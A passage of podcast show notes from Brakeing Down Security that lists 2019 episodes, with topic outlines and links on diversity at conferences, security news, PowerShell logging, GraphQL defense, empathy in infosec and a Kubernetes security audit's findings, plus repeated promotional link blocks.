      3. student scholarship (we want to double the amount of money, target still 10)
      4. Free tickets (expansion over last year)
    2. Present
      1. Slogan contest 2020
      2. I don’t want to think about 2021 yet :)
    3. Future
      1. Mentors
      2. Reviewers
      3. Volunteers
      4. Donations (giving tuesday, scholarships)
    4. Needs/wants

  1. Discuss how to add more DNI into your event (conference, meetup, slack, etc)
    1. Women in Technology Diana 2018
    1. https://business.linkedin.com/talent-solutions/blog/job-descriptions/2018/5-must-dos-for-writing-inclusive-job-descriptions
    2. https://www.hudsonrpo.com/rpo-intelligence/recruitment-process-outsourcing/how-to-write-an-inclusive-job-description/
    3. https://www.refinery29.com/en-us/2017/04/148547/how-to-get-a-raise-chatbot-cindy-gallop
  2. Better job descriptions

  • Other topics of interests
  • Career village / resume clinic work in general (spoken on this twice, volunteer at resume clinic)
  • WAN party / Women’s meetup at Defcon with @sylv3on_ @nemessisc and more
  • GitLab security scans (that's me!) 

  1. We are responsible for baking Sec into DevOps and hence write the red team software (well integrate in most cases) for your appsec team if your devs are using GitLab. We have a security team that secures GitLab itself but that's not us. We have SAST, DAST, Dependency, Secret Detection and License Compliance baked into our paid tier, and SAST is coming down to the free tier! I’m pitching a talk about tuning to shmoocon because it seems like that's the most common question I got as a result of my devsecops talks at derbycon / shellcon / bsidesdc.
    1. N.Schwartz: Are you ready to leverage DevSecOps? BSidesDC 2019

2019 ShellCon Tuneup Tips for Your CV and Profile, From an Interviewer

SE Village Con - Thu, Feb 20 - Sat, Feb 22 | Hilton Orlando Buena Vista Palace

Layer8conf - https://www.workshopcon.com/events

https://layer8conference.com/

Regarding diversity scholarships, it's being worked on and the number of available spots will highly depend on the number of Sponsorships the conference secures.

As a side note WorkshopCon will sponsor a number of Layer8 conference tickets if people follow @WorkshopCon on Twitter and tweet to us why they are interested in Social Engineering and OSINT topics with hashtag #sendMeToLayer8. We will select folks from those tweets with the emphasis being on folks coming from underrepresented or minority groups.

In terms of sponsorship information for Layer8, Patrick wants people to send an email to sponsors@layer8conference.com

Please let us know if you have any other questions, and thank you so much for giving us a hand spreading the word!!!

Saturday June 6, 2020, RI Convention Center

Check out our Store on Teepub! https://brakesec.com/store

Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email bds.podcast@gmail.com

#Brakesec Store!:https://www.teepublic.com/user/bdspodcast

#Spotify: https://brakesec.com/spotifyBDS

#RSS: https://brakesec.com/BrakesecRSS

#Youtube Channel:  http://www.youtube.com/c/BDSPodcast

#iTunes Store Link: https://brakesec.com/BDSiTunes

#Google Play Store: https://brakesec.com/BDS-GooglePlay

Our main site:  https://brakesec.com/bdswebsite

#iHeartRadio App:  https://brakesec.com/iHeartBrakesec

#SoundCloud: https://brakesec.com/SoundcloudBrakesec

Comments, Questions, Feedback: bds.podcast@gmail.com

Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon

https://brakesec.com/BDSPatreon

#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir

#Player.FM : https://brakesec.com/BDS-PlayerFM

#Stitcher Network: https://brakesec.com/BrakeSecStitcher

#TuneIn Radio App: https://brakesec.com/TuneInBrakesec

Nov 27 2019

1hr

Play

2019-041-circuitswan, diana initiative, diversity initiatives at conferences

Podcast cover
Read more

Diana Initiative

@circuitswan

https://www.dianainitiative.org/

https://twitter.com/DianaInitiative

Conference in Las Vegas (Aug 6-7, 2020) (Thu & Fri)

info@dianainitiative.org

Topics  

  1. Diana initiatives
    1. Past
      1. 2015 - idea at defcon 23
      2. 2016-17-18 growing but got too big!
      3. 2019 got our own space, ~800 tickets
      1. 2020 plans-westin again, 2 speaking tracks and 1 workshop track, solder village, career village, CTF, lock picking
      2. Mentoring both CFP and presenters this year! (expansion from last year)
      3. student scholarship (we want to double the amount of money, target still 10)
      4. Free tickets (expansion over last year)
    2. Present
      1. Slogan contest 2020
      2. I don’t want to think about 2021 yet :)
    3. Future
      1. Mentors
      2. Reviewers
      3. Volunteers
      4. Donations (giving tuesday, scholarships)
    4. Needs/wants

  1. Discuss how to add more DNI into your event (conference, meetup, slack, etc)
    1. Women in Technology Diana 2018
    1. https://business.linkedin.com/talent-solutions/blog/job-descriptions/2018/5-must-dos-for-writing-inclusive-job-descriptions
    2. https://www.hudsonrpo.com/rpo-intelligence/recruitment-process-outsourcing/how-to-write-an-inclusive-job-description/
    3. https://www.refinery29.com/en-us/2017/04/148547/how-to-get-a-raise-chatbot-cindy-gallop
  2. Better job descriptions

  • Other topics of interests
  • Career village / resume clinic work in general (spoken on this twice, volunteer at resume clinic)
  • WAN party / Women’s meetup at Defcon with @sylv3on_ @nemessisc and more
  • GitLab security scans (that's me!) 

  1. We are responsible for baking Sec into DevOps and hence write the red team software (well integrate in most cases) for your appsec team if your devs are using GitLab. We have a security team that secures GitLab itself but that's not us. We have SAST, DAST, Dependency, Secret Detection and License Compliance baked into our paid tier, and SAST is coming down to the free tier! I’m pitching a talk about tuning to shmoocon because it seems like that's the most common question I got as a result of my devsecops talks at derbycon / shellcon / bsidesdc.
    1. N.Schwartz: Are you ready to leverage DevSecOps? BSidesDC 2019

2019 ShellCon Tuneup Tips for Your CV and Profile, From an Interviewer

SE Village Con - Thu, Feb 20 - Sat, Feb 22 | Hilton Orlando Buena Vista Palace

Layer8conf - https://www.workshopcon.com/events

https://layer8conference.com/

Regarding diversity scholarships, it's being worked on and the number of available spots will highly depend on the number of Sponsorships the conference secures.

As a side note WorkshopCon will sponsor a number of Layer8 conference tickets if people follow @WorkshopCon on Twitter and tweet to us why they are interested in Social Engineering and OSINT topics with hashtag #sendMeToLayer8. We will select folks from those tweets with the emphasis being on folks coming from underrepresented or minority groups.

In terms of sponsorship information for Layer8, Patrick wants people to send an email to sponsors@layer8conference.com

Please let us know if you have any other questions, and thank you so much for giving us a hand spreading the word!!!

Saturday June 6, 2020, RI Convention Center

Check out our Store on Teepub! https://brakesec.com/store

Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email bds.podcast@gmail.com

#Brakesec Store!:https://www.teepublic.com/user/bdspodcast

#Spotify: https://brakesec.com/spotifyBDS

#RSS: https://brakesec.com/BrakesecRSS

#Youtube Channel:  http://www.youtube.com/c/BDSPodcast

#iTunes Store Link: https://brakesec.com/BDSiTunes

#Google Play Store: https://brakesec.com/BDS-GooglePlay

Our main site:  https://brakesec.com/bdswebsite

#iHeartRadio App:  https://brakesec.com/iHeartBrakesec

#SoundCloud: https://brakesec.com/SoundcloudBrakesec

Comments, Questions, Feedback: bds.podcast@gmail.com

Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon

https://brakesec.com/BDSPatreon

#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir

#Player.FM : https://brakesec.com/BDS-PlayerFM

#Stitcher Network: https://brakesec.com/BrakeSecStitcher

#TuneIn Radio App: https://brakesec.com/TuneInBrakesec

Nov 21 2019

38mins

Play

2019-040-vulns in cisco kit, google's project 'nightmare', healthcare data issues, TAGNW conference update

Podcast cover
Read more

Tagnw.org

Amazon Smile - brakesec.com/smile

News: 

https://www.androidpolice.com/2019/11/11/google-project-nightingale-health-records-collection/

https://www.csoonline.com/article/3439400/secrets-of-latest-smominru-botnet-variant-revealed-in-new-attack.html

https://blog.naijasecforce.com/the-jar-based-malware/ - ms. Infosecsherpa mailing list “nuzzle”

https://www.axios.com/hospitals-cybersecurity-medical-information-hacking-076cb826-fc69-4ba6-b3fd-57ce19ab00c6.html

https://www.axios.com/hospitals-doctors-privacy-records-hacks-data-5cb5d8c1-27de-4cc1-94d8-634015efc04a.html

https://blog.ropnop.com/extracting-ssh-private-keys-from-windows-10-ssh-agent/

       https://en.wikipedia.org/wiki/Data_Protection_API

https://latesthackingnews.com/2019/11/10/multiple-security-issues-detected-in-cisco-small-business-routers-update-now/

https://www.routefifty.com/tech-data/2019/11/plan-engage-hackers-election-security/161045/

https://www.darkreading.com/vulnerabilities---threats/microsoft-security-setting-ironically-increases-risks-for-office-for-mac-users/d/d-id/1336268

Check out our Store on Teepub! https://brakesec.com/store

Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email bds.podcast@gmail.com

#Brakesec Store!:https://www.teepublic.com/user/bdspodcast

#Spotify: https://brakesec.com/spotifyBDS

#RSS: https://brakesec.com/BrakesecRSS

#Youtube Channel:  http://www.youtube.com/c/BDSPodcast

#iTunes Store Link: https://brakesec.com/BDSiTunes

#Google Play Store: https://brakesec.com/BDS-GooglePlay

Our main site:  https://brakesec.com/bdswebsite

#iHeartRadio App:  https://brakesec.com/iHeartBrakesec

#SoundCloud: https://brakesec.com/SoundcloudBrakesec

Comments, Questions, Feedback: bds.podcast@gmail.com

Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon

https://brakesec.com/BDSPatreon

#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir

#Player.FM : https://brakesec.com/BDS-PlayerFM

#Stitcher Network: https://brakesec.com/BrakeSecStitcher

#TuneIn Radio App: https://brakesec.com/TuneInBrakesec

Nov 12 2019

1hr 6mins

Play

2019-039-bluekeep_weaponized-npm_security_cracks-grrcon_report

Podcast cover
Read more

Grrcon update

2019-039-  bluekeep Weaponized… and more

Bluekeep weaponized

https://www.bleepingcomputer.com/news/security/bluekeep-remote-code-execution-bug-in-rdp-exploited-en-masse/

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708

https://www.microsoft.com/security/blog/2019/08/08/protect-against-bluekeep/

https://www.wired.com/story/bluekeep-hacking-cryptocurrency-mining

NordVPN hacked: https://arstechnica.com/information-technology/2019/11/nordvpn-users-passwords-exposed-in-mass-credential-stuffing-attacks/

Null sessions and how to avoid them:https://www.dummies.com/programming/networking/null-session-attacks-and-how-to-avoid-them/

https://social.technet.microsoft.com/Forums/en-US/2acdfb53-edee-444e-9ffa-25dcebcd9181/smb-null-sessions

Linux has a marketing problem:

https://hackaday.com/2019/10/31/linuxs-marketing-problem/

20 accounts could pwn majority of NPM

https://www.zdnet.com/article/hacking-20-high-profile-dev-accounts-could-compromise-half-of-the-npm-ecosystem/

Chrome 0day

https://thehackernews.com/2019/11/chrome-zero-day-update.html

India Nuclear plant is hacked

https://arstechnica.com/information-technology/2019/10/indian-nuclear-power-company-confirms-north-korean-malware-attack/

High Tea Security Podcast: 

https://www.podcasts.com/high-tea-security-190182dc8

https://TAGNW.org - Bryan

Panel and talking about networking

Securewv.org - Training - https://www.eventbrite.com/e/security-dd-tickets-79219348203

Bsides Fredericton - https://www.eventbrite.ca/e/security-bsides-fredericton-2019-tickets-59449704667

Check out our Store on Teepub! https://brakesec.com/store

Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email bds.podcast@gmail.com

#Brakesec Store!:https://www.teepublic.com/user/bdspodcast

#Spotify: https://brakesec.com/spotifyBDS

#RSS: https://brakesec.com/BrakesecRSS

#Youtube Channel:  http://www.youtube.com/c/BDSPodcast

#iTunes Store Link: https://brakesec.com/BDSiTunes

#Google Play Store: https://brakesec.com/BDS-GooglePlay

Our main site:  https://brakesec.com/bdswebsite

#iHeartRadio App:  https://brakesec.com/iHeartBrakesec

#SoundCloud: https://brakesec.com/SoundcloudBrakesec

Comments, Questions, Feedback: bds.podcast@gmail.com

Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon

https://brakesec.com/BDSPatreon

#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir

#Player.FM : https://brakesec.com/BDS-PlayerFM

#Stitcher Network: https://brakesec.com/BrakeSecStitcher

#TuneIn Radio App: https://brakesec.com/TuneInBrakesec

Nov 04 2019

53mins

Play

2019-038-Deveeshree_Nayak-risk_analysis, and OWASP WIA

Podcast cover
Read more

OWASP WIA - https://www.youtube.com/watch?v=umnt0qbOPsE

https://www.owasp.org/index.php/Women_In_AppSec

OWASP Women in AppSec

Twitter: 2013_Nayak (reach and ask to be added)

https://www.tagnw.org/events/

Risk in Infosec

Risk - a situation which involves extreme danger and extensive amount of unrecovered loss

    What about risks that are positive in nature?  PMP calls them ‘opportunities’

Risk Analysis - systemic examination of the components and characteristics of risk

Analysis Steps - 

        Understanding and Assessment

            Understand there is a risk

            What if a company does not have security standards?

        Identification

            Identify and categorize risk - 

                Informational risk

                Network risk

                Hardware risk

                Software risk

                Environment risk?

https://en.wikipedia.org/wiki/Routine_activity_theory

            Scope of risk analysis?

            Threat modeling to find risks?

https://www.leviathansecurity.com/blog/the-calculus-of-threat-modeling

            SWOT (strength/weakness/opportunities/threats) analysis will discover risks?

            Risk analysis methodologies?

https://www.project-risk-manager.com/blog/qualitative-risk-techniques/

https://securityscorecard.com/blog/it-security-risk-assessment-methodology

https://en.wikipedia.org/wiki/Probabilistic_risk_assessment

https://en.wikipedia.org/wiki/Capability_Maturity_Model_Integration

        Estimation

            Chance that risk will occur (once a decade, once a week)

            Design controls to remediate

        Implementation

            Risk assessment is a combined approach

            Combined approach for a risk analysis

                You mentioned a lot of people, what’s the scope?

                How do you do the risk assessment? Framework?

        Evaluation

            Evaluation approach

                Like an agile approach

            Provides an informed conclusion

            Report must be clear (no jargon)

        Decision Making

Examples to Reduce Risk

Training and education

    what kind of testing? Annual Security training?

Publishing policies

Agreement with organization

    BAA with 3rd parties

Timely testing - 

Oct 30 2019

1hr 16mins

Play

2019-038- Ethical dilemmas with offensive tools, powershell discussion with Lee Holmes - Part2

Podcast cover
Read more

Derbycon9 talk - PowerShell Security Looking Back from the Inside - https://www.youtube.com/watch?v=DYWPtt7qszY&list=PLNhlcxQZJSm_ZDJBksg97I5q1XsdQcyN5&index=27&t=0s

Encarta - https://en.wikipedia.org/wiki/Encarta

Scott Hanselman’s twitter thread about Encarta: https://twitter.com/shanselman/status/1158780839464849409

Congrats on the black badge :)

I like that you bring up execution policies. That it was never created to become a security control

  • I started alerting on it anyway at least from non-admin devices

https://www.mssqltips.com/sqlservertip/2702/setting-the-powershell-execution-policy/

Want to learn Powershell? UnderTheWire wargame: https://underthewire.tech/

Jeffrey Snover “The Cultural battle to remove Windows from Windows Server”: https://www.youtube.com/watch?v=3Uvq38XOark

You talk about “why would anyone want to remove powershell” as it came as a standalone download and part of the windows sdk. - I was taught when I was just getting into tech, that I should fear powershell and didn’t realize how powerful it could be as an admin because of it.

Powershell slime trail <3 (powershell transparency)

“You can’t force a powerful tool only to be used how you want it to be used, you can tilt the playing field on behalf of defenders”

If an attacker is going to use powershell, let’s make them regret it

Powershell has had quite an impact and history.

My own sorry logging/alerting attempts

You mentioned the amount of attacks listed in MITRE that use powershell, is that *the* recommended resource for blue teamers, are there any others?

Revoke-Obfuscation white paper (blackhat2017): https://www.blackhat.com/docs/us-17/thursday/us-17-Bohannon-Revoke-Obfuscation-PowerShell-Obfuscation-Detection-And%20Evasion-Using-Science-wp.pdf

https://github.com/danielbohannon/Invoke-Obfuscation

https://github.com/danielbohannon/Revoke-Obfuscation

https://blog.trendmicro.com/trendlabs-security-intelligence/ransomware-now-uses-windows-powershell/

https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/TROJ_POSHCODER.A

Ever thought of writing a powershell security sentric book? Bill Pollock was looking for someone to write a book for NoStarch…

Derbycon keynote with Lee Holmes and Jeffrey Snover - http://www.irongeek.com/i.php?page=videos/derbycon6/101-key-note-jeffrey-snover-lee-holmes

AMSI - Antimalware Scan Interface: https://docs.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal

https://www.amazon.com/dp/B00ARN9MEK/ref=dp-kindle-redirect?_encoding=UTF8&btkr=1 -  Windows Powershell cookbook

Eric conrad: https://www.ericconrad.com/2016/09/deepbluecli-powershell-module-for-hunt.html

https://github.com/sans-blue-team/DeepBlueCLI

Daniel Bohannon - DevSec Defense - https://www.youtube.com/watch?v=QJe8xikf-iE

https://github.com/psconfeu/2018/tree/master/Daniel%20Bohannon/DevSec%20Defense

Constrained language mode: https://devblogs.microsoft.com/powershell/powershell-constrained-language-mode/

Maslow’s security Hierarchy: https://www.leeholmes.com/blog/2014/12/08/maslows-hierarchy-of-security-controls/

Just Enough Administration: https://docs.microsoft.com/en-us/previous-versions//dn896648(v=technet.10)?redirectedfrom=MSDN

https://github.com/infosecn1nja/AD-Attack-Defense

Also - DrawOnMyBadge.com - Super cool idea, loved the mona lisa

@Lee_Holmes

@hackershealth

@log-md

@infosecCampout

@seasecEast

@brakesec

@bryanbrake

@boettcherpwned

@Infosystir

@packscott

@dpcybuck

@megan_roddie

@consultingCSO

Oct 22 2019

52mins

Play

2019-037-Lee Holmes, Powershell logging, and why there's an 'execution bypass'

Podcast cover
Read more

Derbycon9 talk - PowerShell Security Looking Back from the Inside - https://www.youtube.com/watch?v=DYWPtt7qszY&list=PLNhlcxQZJSm_ZDJBksg97I5q1XsdQcyN5&index=27&t=0s

Encarta - https://en.wikipedia.org/wiki/Encarta

Scott Hanselman’s twitter thread about Encarta: https://twitter.com/shanselman/status/1158780839464849409

Congrats on the black badge :)

I like that you bring up execution policies. That it was never created to become a security control

  • I started alerting on it anyway at least from non-admin devices

https://www.mssqltips.com/sqlservertip/2702/setting-the-powershell-execution-policy/

Want to learn Powershell? UnderTheWire wargame: https://underthewire.tech/

Jeffrey Snover “The Cultural battle to remove Windows from Windows Server”: https://www.youtube.com/watch?v=3Uvq38XOark

You talk about “why would anyone want to remove powershell” as it came as a standalone download and part of the windows sdk. - I was taught when I was just getting into tech, that I should fear powershell and didn’t realize how powerful it could be as an admin because of it.

Powershell slime trail <3 (powershell transparency)

“You can’t force a powerful tool only to be used how you want it to be used, you can tilt the playing field on behalf of defenders”

If an attacker is going to use powershell, let’s make them regret it

Powershell has had quite an impact and history.

My own sorry logging/alerting attempts

You mentioned the amount of attacks listed in MITRE that use powershell, is that *the* recommended resource for blue teamers, are there any others?

Revoke-Obfuscation white paper (blackhat2017): https://www.blackhat.com/docs/us-17/thursday/us-17-Bohannon-Revoke-Obfuscation-PowerShell-Obfuscation-Detection-And%20Evasion-Using-Science-wp.pdf

https://github.com/danielbohannon/Invoke-Obfuscation

https://github.com/danielbohannon/Revoke-Obfuscation

https://blog.trendmicro.com/trendlabs-security-intelligence/ransomware-now-uses-windows-powershell/

https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/TROJ_POSHCODER.A

Ever thought of writing a powershell security sentric book? Bill Pollock was looking for someone to write a book for NoStarch…

Derbycon keynote with Lee Holmes and Jeffrey Snover - http://www.irongeek.com/i.php?page=videos/derbycon6/101-key-note-jeffrey-snover-lee-holmes

AMSI - Antimalware Scan Interface: https://docs.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal

https://www.amazon.com/dp/B00ARN9MEK/ref=dp-kindle-redirect?_encoding=UTF8&btkr=1 -  Windows Powershell cookbook

Eric conrad: https://www.ericconrad.com/2016/09/deepbluecli-powershell-module-for-hunt.html

https://github.com/sans-blue-team/DeepBlueCLI

Daniel Bohannon - DevSec Defense - https://www.youtube.com/watch?v=QJe8xikf-iE

https://github.com/psconfeu/2018/tree/master/Daniel%20Bohannon/DevSec%20Defense

Constrained language mode: https://devblogs.microsoft.com/powershell/powershell-constrained-language-mode/

Maslow’s security Hierarchy: https://www.leeholmes.com/blog/2014/12/08/maslows-hierarchy-of-security-controls/

Just Enough Administration: https://docs.microsoft.com/en-us/previous-versions//dn896648(v=technet.10)?redirectedfrom=MSDN

https://github.com/infosecn1nja/AD-Attack-Defense

Also - DrawOnMyBadge.com - Super cool idea, loved the mona lisa

@Lee_Holmes

@hackershealth

@log-md

@infosecCampout

@seasecEast

@brakesec

@bryanbrake

@boettcherpwned

@Infosystir

@packscott

@dpcybuck

@megan_roddie

@consultingCSO

Oct 17 2019

50mins

Play

2019-036-RvrShell-graphql_defense-Part2

Podcast cover
Read more

Secure Python course: 

https://brakesec.com/brakesecpythonclass

PDF Slides: https://drive.google.com/file/d/1wmxrfgbaHu56kfccLoOd5M3Zz6bNP6Qi/view?usp=sharing

GraphQL High Level

https://graphql.org/

Designed to replace REST Arch

Allow you to make a large request, uses a query language

Released by FB in 2012

JSON 

Learn Enough to be dangerous

https://blog.bitsrc.io/13-graphql-tools-and-libraries-you-should-know-in-2019-e4b9005f6fc2

WSDL: https://www.w3.org/TR/2001/NOTE-wsdl-20010315

Vulns in the Wild

Abusing GraphQL 

OWASP Deserialization Cheat Sheet - https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html

Attack Techniques

https://www.apollographql.com/docs/apollo-server/data/data/

https://github.com/graphql/graphiql

Protecting GraphQL

https://github.com/maticzav/graphql-shield

Magento 2 (runs GraphQL), hard to update…

https://github.com/szski/shapeshifter - Matt’s tool on Shapeshifter

GraphQL implementations inside (ecosystem packages?)

Infosec Campout 2020 occurring (28-29 Aug 2020, Carnation, WA)

Patreon supporters  (Josh P and David G)

Teepub: https://www.teepublic.com/user/bdspodcast

For Amanda next:

https://www.cybercareersummit.com/

& keynote @grrcon oct 24/25

Check out our Store on Teepub! https://brakesec.com/store

Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email bds.podcast@gmail.com

#Brakesec Store!:https://www.teepublic.com/user/bdspodcast

#Spotify: https://brakesec.com/spotifyBDS

#RSS: https://brakesec.com/BrakesecRSS

#Youtube Channel:  http://www.youtube.com/c/BDSPodcast

#iTunes Store Link: https://brakesec.com/BDSiTunes

#Google Play Store: https://brakesec.com/BDS-GooglePlay

Our main site:  https://brakesec.com/bdswebsite

#iHeartRadio App:  https://brakesec.com/iHeartBrakesec

#SoundCloud: https://brakesec.com/SoundcloudBrakesec

Comments, Questions, Feedback: bds.podcast@gmail.com

Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon

https://brakesec.com/BDSPatreon

#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir

#Player.FM : https://brakesec.com/BDS-PlayerFM

#Stitcher Network: https://brakesec.com/BrakeSecStitcher

#TuneIn Radio App: https://brakesec.com/TuneInBrakesec

Oct 09 2019

57mins

Play

2019-035-Matt_szymanski-attack and defense of GraphQL-Part1

Podcast cover
Read more

Derbycon Discussion (bring Matt in)

Python course: 

https://brakesec.com/brakesecpythonclass

PDF Slides: https://drive.google.com/file/d/1wmxrfgbaHu56kfccLoOd5M3Zz6bNP6Qi/view?usp=sharing

GraphQL High Level

https://graphql.org/

Designed to replace REST Arch

Allow you to make a large request, uses a query language

Released by FB in 2012

JSON 

Learn Enough to be dangerous

https://blog.bitsrc.io/13-graphql-tools-and-libraries-you-should-know-in-2019-e4b9005f6fc2

WSDL: https://www.w3.org/TR/2001/NOTE-wsdl-20010315

Vulns in the Wild

Abusing GraphQL 

OWASP Deserialization Cheat Sheet - https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html

Attack Techniques

https://www.apollographql.com/docs/apollo-server/data/data/

https://github.com/graphql/graphiql

Protecting GraphQL

https://github.com/maticzav/graphql-shield

Magento 2 (runs GraphQL), hard to update…

https://github.com/szski/shapeshifter - Matt’s tool on Shapeshifter

GraphQL implementations inside (ecosystem packages?)

Infosec Campout 2020 occurring (28-29 Aug 2020, Carnation, WA)

Patreon supporters  (Josh P and David G)

Teepub: https://www.teepublic.com/user/bdspodcast

For Amanda next:

https://www.cybercareersummit.com/

& keynote @grrcon oct 24/25

Check out our Store on Teepub! https://brakesec.com/store

Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email bds.podcast@gmail.com

#Brakesec Store!:https://www.teepublic.com/user/bdspodcast

#Spotify: https://brakesec.com/spotifyBDS

#RSS: https://brakesec.com/BrakesecRSS

#Youtube Channel:  http://www.youtube.com/c/BDSPodcast

#iTunes Store Link: https://brakesec.com/BDSiTunes

#Google Play Store: https://brakesec.com/BDS-GooglePlay

Our main site:  https://brakesec.com/bdswebsite

#iHeartRadio App:  https://brakesec.com/iHeartBrakesec

#SoundCloud: https://brakesec.com/SoundcloudBrakesec

Comments, Questions, Feedback: bds.podcast@gmail.com

Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon

https://brakesec.com/BDSPatreon

#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir

#Player.FM : https://brakesec.com/BDS-PlayerFM

#Stitcher Network: https://brakesec.com/BrakeSecStitcher

#TuneIn Radio App: https://brakesec.com/TuneInBrakesec

Oct 02 2019

42mins

Play

2019-034- Tracy Maleeff, empathy as a service, derbycon discussion

Podcast cover
Read more

Podcast Interview (Youtube): https://youtu.be/4tdJwBMh3ow

Tracy Maleeff (pronounced like may-leaf) - https://twitter.com/InfoSecSherpa

https://medium.com/@InfoSecSherpa

https://nuzzel.com/InfoSecSherpa

Python secure coding class - November 2nd / 5 Saturdays @nxvl Teaching

https://www.eventbrite.com/e/secure-python-coding-with-nicolas-valcarcel-registration-72804597511

Derbycon Talk: https://www.youtube.com/watch?v=KILlp4KMIPA

Plugs:

Nuzzel newsletter: https://nuzzel.com/infosecsherpa

OSINT-y Goodness blog: https://medium.com/@infosecsherpa

Tomato pie: 

https://www.eater.com/2016/8/19/12525602/tomato-pie-philadelphia-new-jersey

Infosec is a service industry job (gasp!)

Customer service is an attitude, not department

Reference Interview:https://en.wikipedia.org/wiki/Reference_interview

Approachability

    Does your org make it easy to contact you?

    What is your tone of writing?    What does your outgoing communication look like?

    Reign in your attitude, language, etc…

“I am using an online translator” (great idea!)

What is your department’s reputation?

    Create an assessment of your department…

“I didn’t know there was humans in security?” --

Interest

    Be interested in solving the problem.

    Make interaction a ‘safe space’

        No judging, mocking

    LOL, “EE Cummings”

https://poets.org/poem/amores-i

Listening

    Pay attention to what the end user doesn’t say.

    Don’t interrupt the end user

Interviewing

    Repeat back what the user said or asked

    Tone: Ask clarification questions, not accusatory questions

Searching

    Did security fail the user?

Answering

    Teachable moments

        Building trust/relationship equity

        “While you’re on the phone…”

    “Thank you for your time”

Follow-Up

    Think of ways to create a culture of security

    Create canned emails

    Random acts of kindness

        cyberCupcakes!!!! Or potentially small value gift cards(?)

    Kindness as currency

        Christmas cookies 

            Spreading goodwill

        building relationship equity

            Reciprocity 

        Lunch and learns

People can’t be educated into vaccinations, but behaviorial nudges help

    “Telling people facts won’t change behavior”

Check out our Store on Teepub! https://brakesec.com/store

Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email bds.podcast@gmail.com

#Brakesec Store!:https://www.teepublic.com/user/bdspodcast

#Spotify: https://brakesec.com/spotifyBDS

#RSS: https://brakesec.com/BrakesecRSS

#Youtube Channel:  http://www.youtube.com/c/BDSPodcast

#iTunes Store Link: https://brakesec.com/BDSiTunes

#Google Play Store: https://brakesec.com/BDS-GooglePlay

Our main site:  https://brakesec.com/bdswebsite

#iHeartRadio App:  https://brakesec.com/iHeartBrakesec

#SoundCloud: https://brakesec.com/SoundcloudBrakesec

Comments, Questions, Feedback: bds.podcast@gmail.com

Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon

https://brakesec.com/BDSPatreon

#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir

#Player.FM : https://brakesec.com/BDS-PlayerFM

#Stitcher Network: https://brakesec.com/BrakeSecStitcher

#TuneIn Radio App: https://brakesec.com/TuneInBrakesec

Sep 22 2019

1hr 23mins

Play

2019-033-Part 2 of the Kubernetes security audit discussion (Jay Beale & Aaron Small)

Podcast cover
Read more

Topics:Infosec Campout report

Jay Beale (co-lead for audit) *Bust-a-Kube*  

Aaron Small (product mgr at GKE/Google)

Atreides Partners

Trail of Bits

What was the Audit? 

How did it come about? 

Who were the players?

    Kubernetes Working Group

        Aaron, Craig, Jay, Joel

    Outside vendors:

        Atredis: Josh, Nathan Keltner

        Trail of Bits: Stefan Edwards, Bobby Tonic , Dominik

    Kubernetes Project Leads/Devs

        Interviewed devs -- this was much of the info that went into the threat model

        Rapid Risk Assessments - let’s put the GitHub repository in the show notes

What did it produce?

    Vuln Report

    Threat Model - https://github.com/kubernetes/community/blob/master/wg-security-audit/findings/Kubernetes%20Threat%20Model.pdf

    White Papers

https://github.com/kubernetes/community/tree/master/wg-security-audit/findings

    Discuss the results:

        Threat model findings

            Controls silently fail, leading to a false sense of security

                Pod Security Policies, Egress Network Rules

            Audit model isn’t strong enough for non-repudiation

                By default, API server doesn’t log user movements through system

            TLS Encryption weaknesses

                Most components accept cleartext HTTP

                Boot strapping to add Kubelets is particularly weak       

                Multiple components do not check certificates and/or use self-signed certs

                HTTPS isn’t enforced

                Certificates are long-lived, with no revocation capability

                Etcd doesn’t authenticate connections by default

            Controllers all Bundled together

                Confused Deputy: b/c lower priv controllers bundled in same binary as higher

            Secrets not encrypted at rest by default

            Etcd doesn’t have signatures on its write-ahead log

            DoS attack: you can set anti-affinity on your pods to get nothing else scheduled on their nodes

            Port 10255 has an unauthenticated HTTP server for status and health checking

        Vulns / Findings (not complete list, but interesting)

            Hostpath pod security policy bypass via persistent volumes

            TOCTOU when moving PID to manager’s group

            Improperly patched directory traversal in kubectl cp

            Bearer tokens revealed in logs

            Lots of MitM risk:

            SSH not checking fingerprints: InsecureIgnoreHostKey

            gRPC transport seems all set to WithInsecure()

HTTPS connections not checking certs 

            Some HTTPS connections are unauthenticated

            Output encoding on JSON construction

                This might lead to further work, as JSON can get written to logs that may be consumed elsewhere.

            Non-constant time check on passwords

Lack of re-use / library-ification of code

    Who will use these findings and how? Devs, google, bad guys? 

    Any new audit tools created from this? 

Brad geesaman “Hacking and Hardening Kubernetes Clusters by Example [I] - Brad Geesaman, Symantec   https://www.youtube.com/watch?v=vTgQLzeBfRU

Aaron Small: 

https://cloud.google.com/blog/products/gcp/precious-cargo-securing-containers-with-kubernetes-engine-18

